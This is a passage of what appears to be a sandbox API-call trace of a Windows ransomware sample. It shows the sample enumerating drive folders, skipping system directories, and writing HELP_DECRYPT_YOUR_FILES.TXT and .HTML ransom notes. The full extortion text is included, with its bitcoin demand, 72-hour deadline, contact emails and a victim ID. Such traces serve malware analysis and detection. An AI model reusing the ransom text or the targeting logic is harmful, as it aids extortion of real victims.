.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".sys") returned 0x0
	[0157.504] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18efe4 | out: lpFindFileData=0x18efe4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x85289733, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x2dbfc137, ftLastAccessTime.dwHighDateTime=0x1d70505, ftLastWriteTime.dwLowDateTime=0x2dbfc137, ftLastWriteTime.dwHighDateTime=0x1d70505, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x770b6e36, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1
	[0157.504] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18efe4 | out: lpFindFileData=0x18efe4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x770b6e36, cFileName="Users", cAlternateFileName="")) returned 1
	[0157.504] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18efe4 | out: lpFindFileData=0x18efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xdf96a590, ftLastAccessTime.dwHighDateTime=0x1d976a2, ftLastWriteTime.dwLowDateTime=0xdf96a590, ftLastWriteTime.dwHighDateTime=0x1d976a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x770b6e36, cFileName="Windows", cAlternateFileName="")) returned 1
	[0157.504] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18efe4 | out: lpFindFileData=0x18efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xdf96a590, ftLastAccessTime.dwHighDateTime=0x1d976a2, ftLastWriteTime.dwLowDateTime=0xdf96a590, ftLastWriteTime.dwHighDateTime=0x1d976a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x770b6e36, cFileName="Windows", cAlternateFileName="")) returned 0
	[0157.504] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 1
	[0157.504] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 0
	[0157.506] lstrcpyW (in: lpString1=0x18ebd4, lpString2="C:" | out: lpString1="C:") returned="C:"
	[0157.506] lstrcatW (in: lpString1="C:", lpString2="\\*.*" | out: lpString1="C:\\*.*") returned="C:\\*.*"
	[0157.506] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0157.507] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0157.507] wsprintfW (in: param_1=0x18e4c0, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\HELP_DECRYPT_YOUR_FILES.TXT") returned 30
	[0157.507] CreateFileW (lpFileName="C:\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e0
	[0157.508] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0157.508] WriteFile (in: hFile=0x2e0, lpBuffer=0x18d878*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18e79c, lpOverlapped=0x0 | out: lpBuffer=0x18d878*, lpNumberOfBytesWritten=0x18e79c*=0xc46, lpOverlapped=0x0) returned 1
	[0157.511] CloseHandle (hObject=0x2e0) returned 1
	[0157.513] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18d848, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18d848*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0157.513] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0157.513] GetUserNameA (in: lpBuffer=0x18d72c, pcbBuffer=0x18d844 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18d844) returned 1
	[0157.515] wsprintfW (in: param_1=0x18e6c8, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0157.515] CreateFileW (lpFileName="C:\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e0
	[0157.515] SetFilePointer (in: hFile=0x2e0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0157.515] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0157.515] WriteFile (in: hFile=0x2e0, lpBuffer=0x18e6c8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18e7a4, lpOverlapped=0x0 | out: lpBuffer=0x18e6c8*, lpNumberOfBytesWritten=0x18e7a4*=0x30, lpOverlapped=0x0) returned 1
	[0157.516] CloseHandle (hObject=0x2e0) returned 1
	[0157.516] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0157.517] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0157.517] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0157.517] wsprintfW (in: param_1=0x18e480, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\HELP_DECRYPT_YOUR_FILES.HTML") returned 31
	[0157.517] CreateFileW (lpFileName="C:\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e0
	[0157.519] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0157.519] WriteFile (in: hFile=0x2e0, lpBuffer=0x18dc74*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18e798, lpOverlapped=0x0 | out: lpBuffer=0x18dc74*, lpNumberOfBytesWritten=0x18e798*=0x808, lpOverlapped=0x0) returned 1
	[0157.523] CloseHandle (hObject=0x2e0) returned 1
	[0157.524] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0157.524] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18dc5c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18dc5c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0157.525] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0157.525] GetUserNameA (in: lpBuffer=0x18db40, pcbBuffer=0x18dc58 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18dc58) returned 1
	[0157.526] wsprintfA (in: param_1=0x18e688, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0157.527] CreateFileW (lpFileName="C:\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e0
	[0157.527] SetFilePointer (in: hFile=0x2e0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0157.527] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0157.527] WriteFile (in: hFile=0x2e0, lpBuffer=0x18e688*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18e7a0, lpOverlapped=0x0 | out: lpBuffer=0x18e688*, lpNumberOfBytesWritten=0x18e7a0*=0x43, lpOverlapped=0x0) returned 1
	[0157.528] CloseHandle (hObject=0x2e0) returned 1
	[0157.528] FindFirstFileW (in: lpFileName="C:\\*.*" (normalized: "c:\\*.*"), lpFindFileData=0x18efe4 | out: lpFindFileData=0x18efe4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbaec25, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xbaec25, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x770b6e36, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0xfb9b70
	[0157.529] lstrlenW (lpString="C:\\*.*") returned 6
	[0157.529] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0157.529] CharLowerBuffW (in: lpsz="C:\\*.*", cchLength=0x6 | out: lpsz="c:\\*.*") returned 0x6
	[0157.529] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.529] StrStrW (lpFirst="c:\\*.*", lpSrch="windows") returned 0x0
	[0157.529] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.530] StrStrW (lpFirst="c:\\*.*", lpSrch="boot") returned 0x0
	[0157.530] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.530] StrStrW (lpFirst="c:\\*.*", lpSrch="system volume information") returned 0x0
	[0157.530] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.530] StrStrW (lpFirst="c:\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0157.530] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.530] StrStrW (lpFirst="c:\\*.*", lpSrch="temp") returned 0x0
	[0157.530] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.531] StrStrW (lpFirst="c:\\*.*", lpSrch="program files") returned 0x0
	[0157.531] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.531] StrStrW (lpFirst="c:\\*.*", lpSrch="program files (x86)") returned 0x0
	[0157.531] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.531] StrStrW (lpFirst="c:\\*.*", lpSrch="appdata") returned 0x0
	[0157.531] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.531] StrStrW (lpFirst="c:\\*.*", lpSrch="application data") returned 0x0
	[0157.532] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.532] StrStrW (lpFirst="c:\\*.*", lpSrch="winnt") returned 0x0
	[0157.532] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.532] StrStrW (lpFirst="c:\\*.*", lpSrch="tmp") returned 0x0
	[0157.532] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.538] StrStrW (lpFirst="c:\\*.*", lpSrch="cache") returned 0x0
	[0157.538] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.538] StrStrW (lpFirst="c:\\*.*", lpSrch="temporary internet files") returned 0x0
	[0157.538] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.538] StrStrW (lpFirst="c:\\*.*", lpSrch="webcache") returned 0x0
	[0157.538] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.539] StrStrW (lpFirst="c:\\*.*", lpSrch="inetcache") returned 0x0
	[0157.539] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.539] StrStrW (lpFirst="c:\\*.*", lpSrch="nvidia") returned 0x0
	[0157.539] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.539] StrStrW (lpFirst="c:\\*.*", lpSrch="packages") returned 0x0
	[0157.539] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.539] StrStrW (lpFirst="c:\\*.*", lpSrch="cookies") returned 0x0
	[0157.539] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.540] StrStrW (lpFirst="c:\\*.*", lpSrch="programdata") returned 0x0
	[0157.540] lstrcmpW (lpString1="$Recycle.Bin", lpString2="..") returned -1
	[0157.540] lstrcmpW (lpString1="$Recycle.Bin", lpString2=".") returned -1
	[0157.540] lstrcpyW (in: lpString1=0x18e9cc, lpString2="C:" | out: lpString1="C:") returned="C:"
	[0157.540] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\"
	[0157.540] lstrcatW (in: lpString1="C:\\", lpString2="$Recycle.Bin" | out: lpString1="C:\\$Recycle.Bin") returned="C:\\$Recycle.Bin"
	[0157.540] lstrcpyW (in: lpString1=0x18dec4, lpString2="C:\\$Recycle.Bin" | out: lpString1="C:\\$Recycle.Bin") returned="C:\\$Recycle.Bin"
	[0157.540] lstrcatW (in: lpString1="C:\\$Recycle.Bin", lpString2="\\" | out: lpString1="C:\\$Recycle.Bin\\") returned="C:\\$Recycle.Bin\\"
	[0157.541] lstrcpyW (in: lpString1=0x18dab4, lpString2="C:\\$Recycle.Bin\\" | out: lpString1="C:\\$Recycle.Bin\\") returned="C:\\$Recycle.Bin\\"
	[0157.541] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\", lpString2="*.*" | out: lpString1="C:\\$Recycle.Bin\\*.*") returned="C:\\$Recycle.Bin\\*.*"
	[0157.541] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*.*" (normalized: "c:\\$recycle.bin\\*.*"), lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x77b1180e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x77b1180e, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0157.541] lstrlenW (lpString="C:\\$Recycle.Bin\\*.*") returned 19
	[0157.541] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0157.542] CharLowerBuffW (in: lpsz="C:\\$Recycle.Bin\\*.*", cchLength=0x13 | out: lpsz="c:\\$recycle.bin\\*.*") returned 0x13
	[0157.542] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.542] StrStrW (lpFirst="c:\\$recycle.bin\\*.*", lpSrch="windows") returned 0x0
	[0157.542] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.542] StrStrW (lpFirst="c:\\$recycle.bin\\*.*", lpSrch="boot") returned 0x0
	[0157.542] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.542] StrStrW (lpFirst="c:\\$recycle.bin\\*.*", lpSrch="system volume information") returned 0x0
	[0157.543] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.543] StrStrW (lpFirst="c:\\$recycle.bin\\*.*", lpSrch="$recycle.bin") returned="$recycle.bin\\*.*"
	[0157.543] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0157.543] lstrcpyW (in: lpString1=0x18dec4, lpString2="C:\\$Recycle.Bin" | out: lpString1="C:\\$Recycle.Bin") returned="C:\\$Recycle.Bin"
	[0157.543] lstrcatW (in: lpString1="C:\\$Recycle.Bin", lpString2="\\*.*" | out: lpString1="C:\\$Recycle.Bin\\*.*") returned="C:\\$Recycle.Bin\\*.*"
	[0157.543] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0157.543] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0157.543] wsprintfW (in: param_1=0x18d7b0, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\$Recycle.Bin\\HELP_DECRYPT_YOUR_FILES.TXT") returned 43
	[0157.544] CreateFileW (lpFileName="C:\\$Recycle.Bin\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\$recycle.bin\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378
	[0157.544] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0157.544] WriteFile (in: hFile=0x378, lpBuffer=0x18cb68*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18da8c, lpOverlapped=0x0 | out: lpBuffer=0x18cb68*, lpNumberOfBytesWritten=0x18da8c*=0xc46, lpOverlapped=0x0) returned 1
	[0157.547] CloseHandle (hObject=0x378) returned 1
	[0157.548] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18cb38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18cb38*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0157.549] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0157.549] GetUserNameA (in: lpBuffer=0x18ca1c, pcbBuffer=0x18cb34 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18cb34) returned 1
	[0157.550] wsprintfW (in: param_1=0x18d9b8, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0157.550] CreateFileW (lpFileName="C:\\$Recycle.Bin\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\$recycle.bin\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378
	[0157.550] SetFilePointer (in: hFile=0x378, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0157.550] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0157.551] WriteFile (in: hFile=0x378, lpBuffer=0x18d9b8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18da94, lpOverlapped=0x0 | out: lpBuffer=0x18d9b8*, lpNumberOfBytesWritten=0x18da94*=0x30, lpOverlapped=0x0) returned 1
	[0157.551] CloseHandle (hObject=0x378) returned 1
	[0157.551] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0157.551] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0157.552] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0157.552] wsprintfW (in: param_1=0x18d770, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\$Recycle.Bin\\HELP_DECRYPT_YOUR_FILES.HTML") returned 44
	[0157.552] CreateFileW (lpFileName="C:\\$Recycle.Bin\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\$recycle.bin\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378
	[0157.557] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0157.557] WriteFile (in: hFile=0x378, lpBuffer=0x18cf64*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18da88, lpOverlapped=0x0 | out: lpBuffer=0x18cf64*, lpNumberOfBytesWritten=0x18da88*=0x808, lpOverlapped=0x0) returned 1
	[0157.560] CloseHandle (hObject=0x378) returned 1
	[0157.560] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0157.561] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18cf4c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18cf4c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0157.561] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0157.561] GetUserNameA (in: lpBuffer=0x18ce30, pcbBuffer=0x18cf48 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18cf48) returned 1
	[0157.562] wsprintfA (in: param_1=0x18d978, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0157.562] CreateFileW (lpFileName="C:\\$Recycle.Bin\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\$recycle.bin\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378
	[0157.563] SetFilePointer (in: hFile=0x378, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0157.563] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
